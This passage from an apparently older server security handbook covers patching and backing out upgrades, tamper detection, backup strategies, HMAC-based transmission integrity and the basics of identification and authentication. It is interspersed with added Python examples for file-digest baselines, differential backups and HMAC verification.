    bzip2-devel-1.0.2-2.i386.rpm: md5 OK
    # rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm        (upgrade the package)
    Preparing...                ########################################### [100%]
       1:bzip2-devel            ########################################### [100%]
    # rpm -q bzip2-devel                           (confirm that the version is now 1.0.2-2)
    bzip2-devel-1.0.2-2

Installing a Solaris security patch is similarly easy. After downloading patch 104489-15.tar.Z from http://sunsolve.sun.com, the installpatch script bundled inside the patch archive is used to install the patch:

    % ls *.tar.Z
    104489-15.tar.Z
    % uncompress *.Z
    % tar xf 104489-15.tar
    % cd 104489-15
    % ls
    .diPatch*          SUNWtltk/    backoutpatch*   postbackout*
    Install.info*      SUNWtltkd/   installpatch*   postpatch*
    README.104489-15   SUNWtltkm/   patchinfo*
    % su
    Password: password
    # ./installpatch .
    Checking installed patches...
    Generating list of files to be patched...
    Verifying sufficient filesystem capacity (exhaustive method)...
    Installing patch packages...

    Patch number 104489-15 has been successfully installed.
    See /var/sadm/patch/104489-15/log for details
    Executing postpatch script...

    Patch packages installed:
      SUNWtltk
      SUNWtltkd
      SUNWtltkm
    # showrev -p | egrep 104489
    Patch: 104489-01 Obsoletes:  Packages: SUNWtltk, SUNWtltkd
    Patch: 104489-14 Obsoletes:  Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
    Patch: 104489-15 Obsoletes:  Packages: SUNWtltk, SUNWtltkd, SUNWtltkm

If you're using source-based management, upgrading involves either a CVS checkout of the updated source code or applying a patch file to the old source code to update it. In either case, the source code must then be recompiled and reinstalled.
Here is an example of applying a patch to an application:

    % ls -ld *
    -rw-rw----    1 dunemush dunemush   188423 Jul 20 12:07 1.7.5-patch09
    drwx------   10 dunemush dunemush     4096 Jul  4 16:15 pennmush/
    % cd pennmush
    % patch -p1 -s < ../1.7.5-patch09
    % make
    ...source code compile messages...
    % make install
    ...installation messages...
    %

If you're upgrading a server program, of course, you will need to stop the running server process and restart it to run the newly installed version: simply changing the server program on disk is not sufficient!

Upgrading applications on Microsoft Windows systems is typically more eccentric. If the application is one of the core Microsoft applications, like Internet Explorer or Media Player, Windows Update will handle patches. But each third-party application must provide its own approach to upgrades. Some may require you to remove the older version and install the new one, others may suggest that you simply install the new version over the older one, and others may have their own built-in update functionality (antivirus engines are particularly notable in this regard). You'll have to examine each application individually.

Backing Out and Backing Up

Not every upgrade is a panacea. Sometimes upgrades cause more problems than they solve, either because they break important functionality or because they don't provide the desired fix. It's important to be able to revert to the pre-upgrade software if the upgrade proves troublesome.

There are two basic strategies for recovering from a bad upgrade. First, it may be possible to "back out" the patch and reinstall the earlier version. Under source-based management systems, the patch program can also be used to remove a previously applied patch, or the earlier version can be checked out from a CVS repository. It can be more difficult to cleanly back out a package.
Although most package management software provides a way to overwrite an installed package with an earlier version, if the package's dependencies have also been updated, older versions of the dependencies may also have to be located and installed. Many, but not all, Microsoft patches are capable of uninstalling themselves or provide uninstall instructions.

A second strategy for source-based systems is to locally back up older versions of software. By keeping older versions of source code, it's generally not difficult to reinstall the earlier version. Multiple versions can be kept in separate directories in /usr/src, or a version control system such as RCS or CVS can be used locally to track multiple versions of software in the same directory.

Perhaps the most reliable method is to perform a full backup of your system prior to the changes. Then, if the upgrade goes badly, you can restore your system to the prior state.

Integrity Monitoring

Ensuring that system software is up to date when new patches are released is an important part of maintaining integrity. Equally important is ensuring that system software, and your valuable data, doesn't change when you don't expect it to. Ideally, no unauthorized user or process would be able to tamper with your information; good server administration practices reduce the likelihood of someone gaining privileges they shouldn't have. In practice, however, it's necessary to monitor your data on an ongoing basis so that you can discover tampering if it occurs, and to archive your data so that you can restore it to a correct state.

Tampering

There are several ways to safeguard against tampering. In addition to using care in the organization of user and file permissions, critical files that change infrequently can be kept on read-only media. Files can also be encrypted so that additional passwords are required to covertly modify the information they contain (though it may still be possible to corrupt or delete the files themselves).
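The digest-based detection approach that the Tampering discussion goes on to describe (compute cryptographic digests of important files, keep them off-line, compare later), which is also the "compare the files on the computer with the files on the backup" use of a baseline, as an added Python example. This is not code from the Handbook or from any product it names: it records a SHA-256 digest, permission bits and size for every file under a directory, stores the baseline as JSON (in practice on off-line or read-only media, as the text advises), and later reports files that were added, removed or changed. The directory, file names and contents in demo() are constructed.

```python
"""Digest-based tamper detection (added example, not the Handbook's own code):
record a baseline of file digests, keep it away from the monitored tree, and
later compare the tree against it to find added, removed and changed files."""
import hashlib
import json
import tempfile
from pathlib import Path


def file_digest(path: Path, algorithm: str = "sha256") -> str:
    """Hex digest of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each regular file under root (path relative to root) to digest, mode and size."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            baseline[str(p.relative_to(root))] = {
                "sha256": file_digest(p),
                "mode": st.st_mode & 0o7777,   # a permission change counts as tampering too
                "size": st.st_size,
            }
    return baseline


def save_baseline(baseline: dict, dest: Path) -> None:
    """Write the baseline as JSON; in practice dest lives on off-line or read-only media."""
    dest.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(root: Path, baseline: dict) -> dict:
    """Classify the current tree against the stored baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
    }


def demo() -> dict:
    """Constructed scenario: baseline a small tree, then alter it in three ways."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "etc"
        tree.mkdir()
        (tree / "hosts").write_text("127.0.0.1 localhost\n")
        (tree / "motd").write_text("Authorized use only.\n")
        store = Path(tmp) / "baseline.json"   # stands in for the off-line copy
        save_baseline(build_baseline(tree), store)

        # Simulated changes made after the baseline was taken.
        with (tree / "hosts").open("a") as fh:
            fh.write("10.0.0.5 update-server\n")        # a changed file
        (tree / "rc.local").write_text("#!/bin/sh\n")   # an added file
        (tree / "motd").unlink()                         # a removed file

        return compare(tree, load_baseline(store))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The comparison is only as trustworthy as the stored baseline: if an intruder can rewrite baseline.json, the check will report nothing, which is why the text puts the digests off-line or under encryption. Authorized changes (a patch, a configuration edit) require the baseline to be rebuilt, exactly as the backup copy must be updated in the write-once-media approach.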
There are also many approaches to detecting tampering. For smaller systems, or when there are a limited number of key files to protect, making backups of the files on write-once media can be an effective strategy. Files can be regularly compared to their archived counterparts, and if a file is corrupted, the backup can be used to restore it. Of course, when an authorized change is made to a file, the backup must also be updated. Cryptographic digests of important files can be computed and stored off-line or protected by encryption. As noted earlier, an important property of cryptographic digests is that it is infeasible to generate a new file that will match a given digest. Some antivirus systems can perform a similar function, often called "inoculation", in which checksums are inserted into the executable files themselves. Chapter 5 discusses the use of comparison files and cryptographic digests for ongoing auditing of system data in greater detail.

Backups

Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite your best efforts, they can't be prevented. But if you have backups, you can compare your current system with your backed-up system, and you can restore your system to a stable state. Even if you lose your entire computer (to fire, for instance), with a good set of backups you can restore the information after you have purchased or borrowed a replacement machine. Insurance can cover the cost of a new CPU and disk drive, but your data is something that in many cases can never be replaced.

Years ago, making daily backups was a common practice because computer hardware would often fail for no obvious reason. A backup was the only protection against data loss. Today, hardware failure is still a good reason to back up your system.
Hard disk failures are a random process: even though a typical hard disk will now last for five years or more, an organization that has 20 or 30 hard disks can expect a significant drive failure every few months. Drives frequently fail without warning, sometimes only a few days after they have been put into service. It's prudent, therefore, to back up your system on a regular basis.

Backups can also be an important tool for securing computers against attacks. Specifically, a full backup allows you to see what an intruder has changed, by comparing the files on the computer with the files on the backup. Make your first backup of your computer after you install its operating system, load your applications, and install all of the necessary security patches. Not only will this first backup allow you to analyze your system after an attack to see what has been modified, but it will also save the time of rebuilding your system from scratch in the event of a hardware failure.

How to back up

There are many different forms of backups in use today. Here are just a few:

· Copy your critical files to a high-density removable magnetic or optical disk.

· Periodically copy your disk to a spare or "mirror" disk.

· Instantaneously mirror two disks using either software or hardware RAID systems.

· Make periodic zip, "sit", or "tar" archives of your important files. You can keep these backups on your primary system, or you can copy them to another computer, possibly at a different location.

· Make backups onto magnetic or optical tape.

· Back up your files over a network or over the Internet to another computer that you own, or to an Internet backup service. Some of these services can be exceedingly sophisticated. For example, the services can examine the MD5 checksums of your files and only back up files that are "unique."
Thus, if you have a thousand computers, each with a copy of Microsoft Office, none of those application files need to be copied over the network to add them to the backup.

What to back up

There are two approaches to computer backup systems:

1. Back up everything that is unique to your system: user accounts, data files, and important system directories that have been customized for your computer. This approach saves tape or disk and decreases the amount of time that a backup takes; in the event of a system failure, you recover by reinstalling your computer's operating system, reloading all of the applications, and then restoring your backup tapes.

2. Back up everything, because restoring a complete system is easier than restoring an incomplete one, and tape is cheap.

The second approach should generally be preferred. While some of the information you back up is already "backed up" on the original distribution disks or tapes you used to load the system onto your hard disk, distribution disks or tapes sometimes get lost. Furthermore, as your system ages, programs get installed in the operating system's reserved directories as security holes get discovered and patched, and as other changes occur. If you've ever tried to restore your system after a disaster, you know how much easier the process is when everything is in the same place. For this reason, it is recommended that you store everything from your system (and that means everything necessary to reinstall the system from scratch, every last file) onto backup media at regular, predefined intervals. How often you do this depends on the speed of your backup equipment and the amount of storage space allocated for backups, as well as the needs of your organization. You might want to do a total backup once a week, or you might want to do it only twice a year.

Types of Backups

There are three basic types of backups:

Level-zero backup
Makes a copy of your original system.
When your system is first installed, before people have started to use it, back up every file and program on the system. Such a backup can be invaluable after a break-in.

Full backup
Makes a copy to the backup device of every file on your computer. This method is similar to a level-zero backup, except that you do it on a regular basis.

Incremental backup
Makes a copy to the backup device of only those items in a filesystem that have been modified after a particular event (such as the application of a vendor patch) or date (such as the date of the last full backup).

Full backups and incremental backups work together. A common backup strategy is:

· Make a full backup on the first day of every other week.

· Make an incremental backup every evening of everything that has been modified since the last full backup. This kind of incremental backup is sometimes called a differential backup, as it archives those files that differ from the last full backup.

Most administrators of large systems plan and store their backups by disk drive or partition. Different partitions usually require different backup strategies. Some partitions, such as your system partitions (if they are separate), should probably be backed up whenever you make a change to them, on the theory that every change you make to them is too important to lose. You should use full backups for these partitions rather than incremental backups, because they are only usable in their entirety. Likewise, partitions that are used solely for storing application programs really only need to be backed up when new programs are installed or when the configuration of existing programs is changed. On the other hand, partitions that are used for keeping user files are more amenable to incremental backups. But you may wish to make such backups frequently, to minimize the amount of work that would be lost in the event of a failure.
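The "full backup plus nightly differential" strategy above, as an added Python example (not the Handbook's own code, and not any particular backup product): a full backup records the time it was taken, a differential backup archives only the files modified since that time, and a restore extracts the full set and then writes the differential set over it. The home directory, file names and fixed timestamps in demo() are constructed so the run is deterministic. The change criterion is the file's modification time, so a file whose contents are altered without its mtime changing would be missed; a digest-based comparison, as discussed under Tampering, catches that case.

```python
"""Full and differential backups with the standard tarfile module.
Added example, not the Handbook's code; paths and timestamps are constructed."""
import json
import os
import tarfile
import tempfile
import time
from pathlib import Path


def _add_tree(tar: tarfile.TarFile, source: Path, include) -> list:
    """Add every regular file under source for which include(path) is true."""
    names = []
    for p in sorted(source.rglob("*")):
        if p.is_file() and include(p):
            arcname = str(p.relative_to(source))
            tar.add(p, arcname=arcname)
            names.append(arcname)
    return names


def full_backup(source: Path, archive: Path, state_file: Path, now=None) -> list:
    """Archive every file under source and record when this full backup began."""
    # The timestamp is taken before copying starts, so a file modified while the
    # full backup runs is still picked up by the next differential.
    now = time.time() if now is None else now
    with tarfile.open(str(archive), "w:gz") as tar:
        names = _add_tree(tar, source, lambda p: True)
    state_file.write_text(json.dumps({"last_full": now}))
    return names


def differential_backup(source: Path, archive: Path, state_file: Path) -> list:
    """Archive only the files modified since the last full backup."""
    last_full = json.loads(state_file.read_text())["last_full"]
    with tarfile.open(str(archive), "w:gz") as tar:
        return _add_tree(tar, source, lambda p: p.stat().st_mtime >= last_full)


def restore(full_archive: Path, diff_archive: Path, dest: Path) -> None:
    """Restore = the full set, then the differential set written over it."""
    dest.mkdir(parents=True, exist_ok=True)
    # The "data" extraction filter (where this Python has it) refuses members that
    # would escape dest, e.g. absolute paths or ".." components in a crafted archive.
    kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    for archive in (full_archive, diff_archive):
        with tarfile.open(str(archive), "r:gz") as tar:
            tar.extractall(dest, **kwargs)


def demo() -> dict:
    """Constructed scenario: two user files, one of them edited after the full backup."""
    full_time = 1_000_000_000  # fixed timestamps keep the example deterministic
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "home"
        (home / "alice").mkdir(parents=True)
        notes = home / "alice" / "notes.txt"
        report = home / "alice" / "report.txt"
        notes.write_text("v1\n")
        report.write_text("draft\n")
        for f in (notes, report):
            os.utime(f, (full_time - 1000, full_time - 1000))  # older than the full backup

        state = Path(tmp) / "backup-state.json"
        full_tar, diff_tar = Path(tmp) / "full.tar.gz", Path(tmp) / "diff.tar.gz"
        full = full_backup(home, full_tar, state, now=full_time)

        # A later edit: only this file should land in the differential set.
        notes.write_text("v2\n")
        os.utime(notes, (full_time + 500, full_time + 500))
        diff = differential_backup(home, diff_tar, state)

        restored = Path(tmp) / "restore"
        restore(full_tar, diff_tar, restored)
        return {
            "full": full,
            "differential": diff,
            "restored_notes": (restored / "alice" / "notes.txt").read_text(),
            "restored_report": (restored / "alice" / "report.txt").read_text(),
        }


if __name__ == "__main__":
    print(demo())
```

Because each differential is measured against the last full backup rather than against the previous night's tape, a restore needs only two archives (the full set and the most recent differential), which is the practical advantage the text has in mind; the price is that the differential grows every night until the next full backup.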
When you make incremental backups, use a rotating set of backup disks or tapes. The backup you do tonight shouldn't write over the tape you used for last night's backup. Otherwise, if your computer crashes in the middle of tonight's backup, you would lose the data on the disk, the data in tonight's backup (because it is incomplete), and the data in last night's backup (because you partially overwrote it with tonight's backup). Ideally, perform an incremental backup once a night, and have a different tape for every night of the week.

How Long Should You Keep a Backup?

It may take a week or a month to realize that a file has been deleted. Therefore, you should keep some backup tapes for a week, some for a month, and some for several months. Many organizations make yearly or quarterly backups that they archive indefinitely. Some organizations decide to keep their yearly or biannual backups "forever"; it's a small investment in the event that a backup should ever be needed again. In some countries, there may be legal requirements that backups of specific kinds of data (such as accounting records) be kept for a minimum period. On the other hand, it may be important to have a "data destruction" policy that specifies the maximum time backups may be kept.

You may wish to keep on your system an index or listing of the names of the files on your backup tapes. This way, if you ever need to restore a file, you can find the right tape to use by scanning the index, rather than by reading in every single tape. Having a printed copy of these indices is also a good idea, especially if you keep the online index on a system that may itself need to be restored!

If you keep backups for a long period of time, be sure to migrate the data on your backups each time you purchase a new backup system. Otherwise, you might find yourself stuck with tapes that can't be read by anyone, anywhere. This has happened to major research universities and even the U.S.
National Aeronautics and Space Administration.

Other Backup Tips

There are several other good ways to increase the reliability of your backups:

Use redundant backup sets
You can use two distinct sets of backup tapes to create a tandem backup. With this backup strategy, you create two complete backups (call them A and B) on successive backup occasions. Then, when you perform your first incremental backup, the "A incremental," you back up all of the files that were created or modified after the last A backup, even if they are on the B backup. The second time you perform an incremental backup, the "B incremental," you write out all of the files that were created or modified since the last B backup (even if they are on the A incremental backup). This system protects you against media failure, because every file is backed up in two locations. It does, however, double the amount of time that you will spend performing backups.

Replace tapes as needed
Tapes are physical media, and each time you run them through your tape drive they degrade somewhat. Based on your experience with your tape drive and media, you should set a lifetime for each tape. Some vendors establish limits for their tapes (for example, 3 years or 2000 cycles), but others do not. Be certain to see what the vendor recommends, and don't push that limit. The few pennies you may save by using a tape beyond its useful range will not offset the cost of a major loss.

Keep your tape drives clean
If you make your backups to tape, follow the preventive maintenance schedule of your tape drive vendor, and use an appropriate cleaning cartridge or other process as recommended. Being unable to read a tape because a drive is dirty is inconvenient; discovering that the data you've written to tape is corrupt and no one can read it is a disaster.
Verify the backup
On a regular basis, you should attempt to restore a few files chosen at random from your backups, to make sure that your equipment and software are functioning properly. Stories abound about computer centers that have lost disk drives and gone to their backup tapes, only to find them all unreadable. This scenario can occur as a result of bad tapes, improper backup procedures, faulty software, operator error, or other problems. At least once a year, you should attempt to restore your entire system completely from backups to ensure that your entire backup system is working properly. Starting with a different, unconfigured computer, see if you can restore all of your tapes and get the new computer operational. Sometimes you will discover that some critical file is missing from your backup tapes. These practice trials are the best times to discover a problem and fix it. A related exercise that can prove valuable is to pick a file at random, once a week or once a month, and try to restore it. Not only will this reveal whether the backups are comprehensive, but the exercise of doing the restoration may also provide some insight.

An in-depth discussion of backup and restore systems can fill a book; W. Curtis Preston's book, Unix Backup & Recovery, published by O'Reilly and Associates, is an excellent one.

Transmission Integrity

Cryptography also provides the solution to the problem of ensuring that when you transmit data to someone else over a network, the recipient receives the data as you sent it, protected from accidental corruption or intentional tampering. A typical strategy involves digitally signing the file: computing a cryptographic digest, encrypting the digest with a symmetric or asymmetric algorithm, and then sending the encrypted digest along with the file (which may itself be encrypted for confidentiality). The recipient recomputes the digest from the file and then decrypts the transmitted digest.
If they match, the message's integrity is ensured.

A Hash Message Authentication Code (HMAC) function is another technique for verifying the integrity of a message transmitted between two parties that agree on a shared secret key. Essentially, HMAC combines the original message and a key to compute a message digest function of the two. Sometimes additional information, such as protocol sequence numbers, is included as well, to thwart replay attacks. The sender of the message computes the HMAC of the message, the key, and any additional information, and transmits the HMAC with the original message. The recipient recalculates the HMAC using the message and the recipient's copy of the secret key (along with any additional information, such as the expected sequence number), then compares the received HMAC with the calculated HMAC to see if they match. If the two HMACs match, then the recipient knows that the original message has not been modified, because the message digest hasn't changed, and that it is authentic, because the sender knew the shared key, which is presumed to be secret.

HMACs are often used to harden network protocol messages against tampering, because they are much faster to calculate than digital signatures. They are also typically smaller in size. However, HMACs are based on a shared key that must be protected from compromise, while digital signatures are usually performed with public key systems.

Several general cryptographic protocols have been developed to secure network connections. These protocols are typically built from a combination of cryptographic algorithms to support key exchange, authentication, encryption, and message authentication codes, along with specifications for how a client and a server will agree on algorithms and exchange credentials and session keys.
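The HMAC exchange described above, with a protocol sequence number folded into the tag to thwart replay, as an added Python example using the standard hmac module (this is not the Handbook's code, and the shared key, message texts and framing are constructed for illustration). The receiver checks the sequence number first, then recomputes the tag with its own copy of the key and compares it in constant time, so a message that was tampered with in transit, replayed, or produced with the wrong key is rejected.

```python
"""HMAC-protected messages with a sequence number: detects tampering and replay.
Added example, not the Handbook's code; key, messages and framing are constructed."""
import hashlib
import hmac
import struct

# Constructed sample key; in practice it is agreed out of band and kept secret.
SHARED_KEY = b"example-shared-secret-key"


def compute_tag(key: bytes, seq: int, message: bytes) -> bytes:
    """HMAC-SHA256 over the sequence number and the message, as the text describes."""
    # A fixed-width sequence number in front of the message keeps the two fields
    # unambiguous when they are concatenated into the HMAC input.
    framed = struct.pack(">Q", seq) + message
    return hmac.new(key, framed, hashlib.sha256).digest()


def make_message(key: bytes, seq: int, payload: bytes) -> tuple:
    """Sender side: what goes on the wire is (seq, payload, tag)."""
    return seq, payload, compute_tag(key, seq, payload)


class Receiver:
    """Receiver side: holds its copy of the key and the next expected sequence number."""

    def __init__(self, key: bytes):
        self.key = key
        self.expected_seq = 0

    def accept(self, seq: int, payload: bytes, tag: bytes) -> str:
        if seq != self.expected_seq:
            # A replayed (or reordered) message carries a sequence number already used.
            return "rejected: unexpected sequence number"
        # compare_digest runs in constant time, so timing reveals nothing about the tag.
        if not hmac.compare_digest(tag, compute_tag(self.key, seq, payload)):
            return "rejected: HMAC mismatch"
        self.expected_seq += 1
        return "accepted"


def demo() -> list:
    """Constructed exchange: valid, replayed, tampered, valid, and wrong-key messages."""
    rx = Receiver(SHARED_KEY)
    results = []

    first = make_message(SHARED_KEY, 0, b"transfer 100 to account 42")
    results.append(rx.accept(*first))                # genuine message, accepted

    results.append(rx.accept(*first))                # the same message replayed

    seq, _payload, tag = make_message(SHARED_KEY, 1, b"transfer 100 to account 42")
    results.append(rx.accept(seq, b"transfer 900 to account 42", tag))  # altered in transit

    results.append(rx.accept(*make_message(SHARED_KEY, 1, b"status ok")))   # accepted

    results.append(rx.accept(*make_message(b"some-other-key", 2, b"status ok")))  # wrong key
    return results


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Both sides must advance the sequence number in lock step, so a lost message stalls the channel until the protocol resynchronizes; real protocols handle this with windows or explicit retransmission, which is outside what this example shows.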
For example, the SSL/TLS protocol supports these combinations of algorithms:

    EDH-RSA-DES-CBC3-SHA        SSLv3 Kx=DH        Au=RSA Enc=3DES(168) Mac=SHA1
    EDH-DSS-DES-CBC3-SHA        SSLv3 Kx=DH        Au=DSS Enc=3DES(168) Mac=SHA1
    DES-CBC3-SHA                SSLv3 Kx=RSA       Au=RSA Enc=3DES(168) Mac=SHA1
    DHE-DSS-RC4-SHA             SSLv3 Kx=DH        Au=DSS Enc=RC4(128)  Mac=SHA1
    RC4-SHA                     SSLv3 Kx=RSA       Au=RSA Enc=RC4(128)  Mac=SHA1
    RC4-MD5                     SSLv3 Kx=RSA       Au=RSA Enc=RC4(128)  Mac=MD5
    EXP1024-DHE-DSS-RC4-SHA     SSLv3 Kx=DH(1024)  Au=DSS Enc=RC4(56)   Mac=SHA1 export
    EXP1024-RC4-SHA             SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56)   Mac=SHA1 export
    EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024)  Au=DSS Enc=DES(56)   Mac=SHA1 export
    EXP1024-DES-CBC-SHA         SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56)   Mac=SHA1 export
    EXP1024-RC2-CBC-MD5         SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56)   Mac=MD5  export
    EXP1024-RC4-MD5             SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56)   Mac=MD5  export
    EDH-RSA-DES-CBC-SHA         SSLv3 Kx=DH        Au=RSA Enc=DES(56)   Mac=SHA1
    EDH-DSS-DES-CBC-SHA         SSLv3 Kx=DH        Au=DSS Enc=DES(56)   Mac=SHA1
    DES-CBC-SHA                 SSLv3 Kx=RSA       Au=RSA Enc=DES(56)   Mac=SHA1
    EXP-EDH-RSA-DES-CBC-SHA     SSLv3 Kx=DH(512)   Au=RSA Enc=DES(40)   Mac=SHA1 export
    EXP-EDH-DSS-DES-CBC-SHA     SSLv3 Kx=DH(512)   Au=DSS Enc=DES(40)   Mac=SHA1 export
    EXP-DES-CBC-SHA             SSLv3 Kx=RSA(512)  Au=RSA Enc=DES(40)   Mac=SHA1 export
    EXP-RC2-CBC-MD5             SSLv3 Kx=RSA(512)  Au=RSA Enc=RC2(40)   Mac=MD5  export
    EXP-RC4-MD5                 SSLv3 Kx=RSA(512)  Au=RSA Enc=RC4(40)   Mac=MD5  export

Each algorithm combination specifies an algorithm to use for key exchange (Kx, which may be Diffie-Hellman or RSA), authentication (Au, which may be RSA or DSS), encryption (Enc, which may be DES, Triple-DES, RC4, or RC2, with the key length shown), and message authentication codes (Mac, which may be SHA1 or MD5).

CHAPTER 5. IDENTIFICATION AND AUTHENTICATION

At a Glance

Identification actually comprises three concepts. Strictly speaking, identification is the associating of an identity with a subject. Authentication is establishing the validity of an identity.
Authorization is associating rights or privileges with a subject. This chapter is concerned primarily with the first two concepts. Identification and authentication may be performed solely by the workstation that a subject is using, or may involve a network-based authentication system in which user identities are stored by a central server and shared by groups of client workstations.

Identification Techniques

Computers use a variety of user identification systems. The simplest are based on usernames and passwords; others are based on special-purpose hardware that can measure unique distinguishing characteristics of different human beings. Finally, there are systems that are based on public-key cryptography.

No identification technique is foolproof. Fortunately, most of them don't have to be. The goal of most identification systems isn't to eliminate the possibility of impersonation, but to reduce the risk of impersonation, and the resulting losses, to acceptable levels. Another important goal of identification systems is to quantify the amount of risk that remains once the system has been deployed: quantifying the residual risk allows an organization to make decisions about policies, the need or desirability of alternative identification systems, and even the amount of insurance coverage necessary to protect against the remaining amount of fraud.

Physical Identification

Fly to an international airport, flash two pieces of plastic, and you can drive away with a brand new car worth more than $20,000. The only assurance the car rental agency has that you will return its automobile is your word, and the knowledge that if you break your word, they can destroy your credit rating and possibly have you thrown in jail. Your word wouldn't mean much to the rental agency if they didn't know who you were.
It's your driver's license or passport and credit card, combined with a worldwide computer network, that allows the rental agency to determine in seconds whether your credit card has been reported stolen, and that gives the firm and its insurance company the willingness to trust you.

The key features of physical identification are based on the design of identification documents. A passport is a good identification document because it contains information that can be verified physically (sex, height, weight, age, photograph, signature), is difficult to forge, is resistant to tampering and easily shows tampering attempts, and is issued by a reliable and reputable authority that takes care to verify the subject's identity before issuing the document. On the other hand, a paper club membership card has none of these features.

Computer-Based Identification Techniques

For more than fifty years, usernames and passwords have been a part of large-scale computer systems. Even personal computers, which lacked passwords for the first two decades of their existence, now come equipped with software that can control access using usernames and passwords.

There is a key difference that separates username/password systems from the document-based systems discussed earlier in this chapter. Whereas most identification documents are printed with the true name of the individual being identified, username/password-based systems are only interested in establishing that the person who is sitting at the keyboard is the authorized user of a particular account. Traditional document-based systems concern themselves with absolute identification, whereas username/password systems are concerned with relative identification or the continuity of identification. Absolute identification is an extraordinarily difficult task for the typical computer system to perform.
Instead, a plethora of relative identification systems have been fielded. Computer security professionals usually describe these systems as relying on "something that you know," "something that you have," or "something that you are." The following sections describe these three traditional approaches, as well as a newer one: "someplace where you are."

Password-based systems: something that you know

The earliest digital identification systems were based on passwords. Every user of the system is assigned a username and a password; to "prove" your identity to the computer, you simply type your password. If the password that you type matches the password that is stored on the computer, then the assumption is that you must be who you claim to be.

Because they are simple to use and require no special hardware, passwords continue to be the most popular authentication system used in the world today. As a result of this popularity, most of us now have dozens of passwords that we need to remember on an almost daily basis, including PINs (personal identification numbers) or passwords for accessing ATM cards, long-distance calling cards, voice-mail systems, and answering machines, unlocking cell phones, unlocking desktop computers, accessing dialup Internet service providers, downloading electronic mail, and accessing web sites.

There are several problems with passwords, some insurmountable:

· Passwords must be distributed to users. Some systems use default passwords or allow the first user to set a password, but defaults are often left unchanged and the first user may not be the authorized user.

· Passwords can be intercepted when sent to a remote computer. Encryption can lessen this risk, but there is no way to encrypt the PIN a person types at an ATM so that it can't be deciphered by someone looking over his or her shoulder.
· Good passwords are easy to forget, which leads people to write them down, use the same password for many uses, set up simpler second-stage password reminders, or choose bad passwords that are easy to guess.
· Passwords can be shared, which may allow unauthorized people to use resources they shouldn't.

Physical tokens: something that you have

Another way that people can authenticate their identities is through the use of tokens--physical objects whose possession somehow proves identity. Door keys have been used for centuries as physical access tokens; in many modern buildings, metal keys are supplemented with either magnetic or radio-frequency-based access card systems. Access card systems are superior to metal-key-based systems because every card can have a unique number that is tied to an identity. The system, in turn, has a list of the cards authorized to open various doors. Time-based restrictions can be added as well, so that a low-level clerk's card can't be used to gain access to an office after-hours.

Token-based systems tend to be self-policing: users quickly report cards that are lost or stolen because they need their cards to gain access; when a card is reported missing, that card can be deactivated and a new card issued to the holder. This is an improvement over a keypad-based system, where individuals can share their PIN codes without losing their own access.

As with passwords, tokens have problems as well:

· The token doesn't really "prove" who you are. Anybody who has physical possession of the token can gain access to the restricted area.
· If a person loses a token, that person cannot enter the restricted area, even though that person's identity hasn't changed.
· Some tokens are easily copied or forged.

Token-based systems don't really authorize or identify individuals: they authorize the tokens. This is especially a problem when a token is stolen.
For this reason, in high-security applications token systems are frequently combined with some other means of identification: this is often referred to as two-factor authentication. For instance, to gain access to a room or a computer, you might need to both present a token and type an authorization code. This is the technique used by automatic teller machines (ATMs) to identify bank account holders.

Biometrics: something that you are

A third technique becoming more commonly used by computers to determine a person's identity is to make a physical measurement of the person and compare the measurement with a profile that has been previously recorded. This technique is called a biometric, because it is based on measuring something about a living person. Many kinds of biometrics are possible, including images of a person's face, retina, or iris, fingerprints, footprints, or hand geometry, voice prints, handwriting, or typing characteristics, and DNA patterns.

Biometric techniques can be used for both ongoing identification and absolute identification. Using these techniques for ongoing identification is the simplest approach: the first time the user accesses the system, his biometric information is recorded. On subsequent accesses, the new biometric is compared with the stored record. To use biometrics for absolute identification, it is necessary to construct a large database matching names with biometrics. In the United States, the Federal Bureau of Investigation has such a database matching fingerprints to names, and another that matches DNA material.

Compared with passwords and access tokens, biometrics have two clear advantages. They can't be lost or forgotten, and they can't be readily shared, copied, or stolen. But biometric technology has been difficult to bring from the laboratory to the market.
All biometric systems exhibit a certain level of false positives, in which the system erroneously declares a match when it shouldn't, and false negatives, in which the system erroneously declares that two biometrics are from different people, when in fact they are from the same person. To reduce the possibility of false matches, some biometric systems combine the biometric with a password or token. In the case of passwords, a user is typically asked to type a secret identification code, such as a PIN, and then give a biometric sample, such as a voice print. The system uses that PIN to retrieve a specific stored profile, which is then compared with the sample from the profile. In this manner, the system only needs to compare the provided biometric with a single stored measurement, rather than with the entire database.

Biometrics are not perfect:

· A person's biometric "print" must be on file in the computer's database before that person can be identified.
· If the database of biometric records is compromised, then the biometric identification is worthless.
· Unless the measuring equipment is specially protected, the equipment is vulnerable to sabotage and fraud. For example, a clever thief could defeat a voice-recognition system by recording a person speaking his passphrase and then playing it back.

Location: someplace where you are

With the development of computer systems that can readily determine the location of their users, it is now possible to deploy position-based authentication systems. Although the Global Positioning System (GPS) can be readily used for obtaining location information, there are two serious hindrances for GPS in this application: the fact that GPS doesn't usually work indoors, and the fact that there is no way to securely get the positional information from the GPS receiver to the remote service that needs to do the verification.
